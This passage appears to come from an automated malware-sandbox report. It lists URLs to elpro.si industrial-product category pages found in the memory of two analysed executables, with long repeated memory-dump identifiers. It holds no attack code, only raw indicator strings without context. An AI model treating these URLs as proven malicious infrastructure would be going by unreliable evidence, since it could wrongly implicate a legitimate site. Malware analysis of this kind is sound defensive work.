PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-asfalte
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-krusno-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/tipala-za-meritve-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-storitve/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/nadzorne-enote-fiksni-detektorji-
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/hladilniki-za
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/tiristorski-r
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/dodatna-oprema-za-ind
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijske-tablice/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-telefoni
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/fiksni-infrardeci-ir-merilniki-tempe
